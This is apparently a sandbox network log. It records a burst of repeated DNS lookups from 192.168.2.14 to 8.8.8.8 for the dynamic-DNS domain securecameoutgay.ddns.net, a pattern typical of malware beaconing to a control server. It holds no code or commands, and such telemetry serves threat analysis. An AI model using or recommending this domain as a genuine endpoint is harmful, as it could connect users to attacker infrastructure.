                                                    Oct 12, 2024 23:05:48.499048948 CEST192.168.2.148.8.8.80x5adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.506005049 CEST192.168.2.148.8.8.80x5adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.512893915 CEST192.168.2.148.8.8.80x5adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.519972086 CEST192.168.2.148.8.8.80x5adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.527260065 CEST192.168.2.148.8.8.80x5adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.534842968 CEST192.168.2.148.8.8.80xa5d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.542035103 CEST192.168.2.148.8.8.80xa5d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.549123049 CEST192.168.2.148.8.8.80xa5d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.556341887 CEST192.168.2.148.8.8.80xa5d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.563894987 CEST192.168.2.148.8.8.80xa5d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.572669029 CEST192.168.2.148.8.8.80xe307Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.579730034 CEST192.168.2.148.8.8.80xe307Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.587106943 CEST192.168.2.148.8.8.80xe307Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.594136000 CEST192.168.2.148.8.8.80xe307Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.601716042 CEST192.168.2.148.8.8.80xe307Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.608545065 CEST192.168.2.148.8.8.80x4490Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.615608931 CEST192.168.2.148.8.8.80x4490Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.622697115 CEST192.168.2.148.8.8.80x4490Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.631791115 CEST192.168.2.148.8.8.80x4490Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.638396025 CEST192.168.2.148.8.8.80x4490Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.645284891 CEST192.168.2.148.8.8.80x1b90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.652609110 CEST192.168.2.148.8.8.80x1b90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.659504890 CEST192.168.2.148.8.8.80x1b90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.666688919 CEST192.168.2.148.8.8.80x1b90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.673865080 CEST192.168.2.148.8.8.80x1b90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.681453943 CEST192.168.2.148.8.8.80x4328Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.688868999 CEST192.168.2.148.8.8.80x4328Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.697232962 CEST192.168.2.148.8.8.80x4328Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.704339981 CEST192.168.2.148.8.8.80x4328Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.711261988 CEST192.168.2.148.8.8.80x4328Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.718082905 CEST192.168.2.148.8.8.80x27f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.725025892 CEST192.168.2.148.8.8.80x27f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.731694937 CEST192.168.2.148.8.8.80x27f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.738179922 CEST192.168.2.148.8.8.80x27f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.744867086 CEST192.168.2.148.8.8.80x27f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.751430035 CEST192.168.2.148.8.8.80xe6d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.758090973 CEST192.168.2.148.8.8.80xe6d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.764746904 CEST192.168.2.148.8.8.80xe6d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.771291018 CEST192.168.2.148.8.8.80xe6d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.777864933 CEST192.168.2.148.8.8.80xe6d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.784780979 CEST192.168.2.148.8.8.80x1532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.794616938 CEST192.168.2.148.8.8.80x1532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.801539898 CEST192.168.2.148.8.8.80x1532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.809690952 CEST192.168.2.148.8.8.80x1532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.816715002 CEST192.168.2.148.8.8.80x1532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.823719978 CEST192.168.2.148.8.8.80x1a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.830166101 CEST192.168.2.148.8.8.80x1a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.836675882 CEST192.168.2.148.8.8.80x1a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.843226910 CEST192.168.2.148.8.8.80x1a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.850178957 CEST192.168.2.148.8.8.80x1a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.856846094 CEST192.168.2.148.8.8.80xd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.863480091 CEST192.168.2.148.8.8.80xd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.870127916 CEST192.168.2.148.8.8.80xd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.876732111 CEST192.168.2.148.8.8.80xd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.883925915 CEST192.168.2.148.8.8.80xd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.891339064 CEST192.168.2.148.8.8.80x5bd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.901504993 CEST192.168.2.148.8.8.80x5bd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.908433914 CEST192.168.2.148.8.8.80x5bd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.918494940 CEST192.168.2.148.8.8.80x5bd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.928597927 CEST192.168.2.148.8.8.80x5bd1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.935094118 CEST192.168.2.148.8.8.80x8ae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.942245960 CEST192.168.2.148.8.8.80x8ae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.949285984 CEST192.168.2.148.8.8.80x8ae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.955661058 CEST192.168.2.148.8.8.80x8ae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.962404966 CEST192.168.2.148.8.8.80x8ae7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.968919992 CEST192.168.2.148.8.8.80xa4edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.975697994 CEST192.168.2.148.8.8.80xa4edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.982939959 CEST192.168.2.148.8.8.80xa4edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.991710901 CEST192.168.2.148.8.8.80xa4edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.000221968 CEST192.168.2.148.8.8.80xa4edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.007939100 CEST192.168.2.148.8.8.80xf23bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.014739037 CEST192.168.2.148.8.8.80xf23bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.021517992 CEST192.168.2.148.8.8.80xf23bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.028139114 CEST192.168.2.148.8.8.80xf23bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.034729958 CEST192.168.2.148.8.8.80xf23bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.041208982 CEST192.168.2.148.8.8.80x106eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.048263073 CEST192.168.2.148.8.8.80x106eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.055134058 CEST192.168.2.148.8.8.80x106eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.062303066 CEST192.168.2.148.8.8.80x106eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.069345951 CEST192.168.2.148.8.8.80x106eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.075794935 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.082582951 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.089114904 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.095566034 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.102658033 CEST192.168.2.148.8.8.80x8b98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.109340906 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.116441965 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.123194933 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.129785061 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.136590958 CEST192.168.2.148.8.8.80xc01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.145610094 CEST192.168.2.148.8.8.80x303dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.152688980 CEST192.168.2.148.8.8.80x303dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.159374952 CEST192.168.2.148.8.8.80x303dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.165963888 CEST192.168.2.148.8.8.80x303dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.172601938 CEST192.168.2.148.8.8.80x303dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.179331064 CEST192.168.2.148.8.8.80xcb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.185925961 CEST192.168.2.148.8.8.80xcb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.192636013 CEST192.168.2.148.8.8.80xcb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.201421976 CEST192.168.2.148.8.8.80xcb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.208128929 CEST192.168.2.148.8.8.80xcb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.215596914 CEST192.168.2.148.8.8.80xe7b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.222757101 CEST192.168.2.148.8.8.80xe7b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.229505062 CEST192.168.2.148.8.8.80xe7b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.236762047 CEST192.168.2.148.8.8.80xe7b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.244368076 CEST192.168.2.148.8.8.80xe7b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.251862049 CEST192.168.2.148.8.8.80xe6b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.258985043 CEST192.168.2.148.8.8.80xe6b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.265571117 CEST192.168.2.148.8.8.80xe6b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.272376060 CEST192.168.2.148.8.8.80xe6b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.279113054 CEST192.168.2.148.8.8.80xe6b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.285720110 CEST192.168.2.148.8.8.80x7032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.292886019 CEST192.168.2.148.8.8.80x7032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.299802065 CEST192.168.2.148.8.8.80x7032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.306303024 CEST192.168.2.148.8.8.80x7032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.313402891 CEST192.168.2.148.8.8.80x7032Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.320075035 CEST192.168.2.148.8.8.80xc826Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.326805115 CEST192.168.2.148.8.8.80xc826Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.333664894 CEST192.168.2.148.8.8.80xc826Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.340655088 CEST192.168.2.148.8.8.80xc826Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.348954916 CEST192.168.2.148.8.8.80xc826Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.356534958 CEST192.168.2.148.8.8.80xf087Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.364494085 CEST192.168.2.148.8.8.80xf087Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.371645927 CEST192.168.2.148.8.8.80xf087Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.378480911 CEST192.168.2.148.8.8.80xf087Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.386442900 CEST192.168.2.148.8.8.80xf087Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.393534899 CEST192.168.2.148.8.8.80xd1afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.400928974 CEST192.168.2.148.8.8.80xd1afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.407577991 CEST192.168.2.148.8.8.80xd1afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.414421082 CEST192.168.2.148.8.8.80xd1afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.421531916 CEST192.168.2.148.8.8.80xd1afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.428320885 CEST192.168.2.148.8.8.80x2cf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.435264111 CEST192.168.2.148.8.8.80x2cf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.442493916 CEST192.168.2.148.8.8.80x2cf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.449598074 CEST192.168.2.148.8.8.80x2cf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.456577063 CEST192.168.2.148.8.8.80x2cf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.463737011 CEST192.168.2.148.8.8.80xbb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.470901966 CEST192.168.2.148.8.8.80xbb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.477684021 CEST192.168.2.148.8.8.80xbb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.484555960 CEST192.168.2.148.8.8.80xbb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.491442919 CEST192.168.2.148.8.8.80xbb0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.498615980 CEST192.168.2.148.8.8.80xf829Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.505387068 CEST192.168.2.148.8.8.80xf829Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.512324095 CEST192.168.2.148.8.8.80xf829Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.518953085 CEST192.168.2.148.8.8.80xf829Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.525482893 CEST192.168.2.148.8.8.80xf829Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.532485962 CEST192.168.2.148.8.8.80x1a6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.539570093 CEST192.168.2.148.8.8.80x1a6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.546268940 CEST192.168.2.148.8.8.80x1a6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.554166079 CEST192.168.2.148.8.8.80x1a6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.561465025 CEST192.168.2.148.8.8.80x1a6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.569832087 CEST192.168.2.148.8.8.80x60ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.576736927 CEST192.168.2.148.8.8.80x60ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.583648920 CEST192.168.2.148.8.8.80x60ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.590640068 CEST192.168.2.148.8.8.80x60ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.597745895 CEST192.168.2.148.8.8.80x60ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.604620934 CEST192.168.2.148.8.8.80xd46eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.611471891 CEST192.168.2.148.8.8.80xd46eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.618036032 CEST192.168.2.148.8.8.80xd46eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.624744892 CEST192.168.2.148.8.8.80xd46eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.631474018 CEST192.168.2.148.8.8.80xd46eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.637903929 CEST192.168.2.148.8.8.80xb224Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.644597054 CEST192.168.2.148.8.8.80xb224Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.652669907 CEST192.168.2.148.8.8.80xb224Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.659020901 CEST192.168.2.148.8.8.80xb224Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.665762901 CEST192.168.2.148.8.8.80xb224Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.672450066 CEST192.168.2.148.8.8.80xf4ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.678886890 CEST192.168.2.148.8.8.80xf4ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.685519934 CEST192.168.2.148.8.8.80xf4ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.691926956 CEST192.168.2.148.8.8.80xf4ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.698494911 CEST192.168.2.148.8.8.80xf4ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.704967022 CEST192.168.2.148.8.8.80x8000Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.714447021 CEST192.168.2.148.8.8.80x8000Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.721052885 CEST192.168.2.148.8.8.80x8000Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.727680922 CEST192.168.2.148.8.8.80x8000Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.734515905 CEST192.168.2.148.8.8.80x8000Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.741241932 CEST192.168.2.148.8.8.80xb7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.747792959 CEST192.168.2.148.8.8.80xb7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.757694960 CEST192.168.2.148.8.8.80xb7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.767359018 CEST192.168.2.148.8.8.80xb7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.777514935 CEST192.168.2.148.8.8.80xb7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.784392118 CEST192.168.2.148.8.8.80x83e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.791117907 CEST192.168.2.148.8.8.80x83e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.798151016 CEST192.168.2.148.8.8.80x83e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.805124998 CEST192.168.2.148.8.8.80x83e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.811640978 CEST192.168.2.148.8.8.80x83e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.818371058 CEST192.168.2.148.8.8.80x45e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.824810982 CEST192.168.2.148.8.8.80x45e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
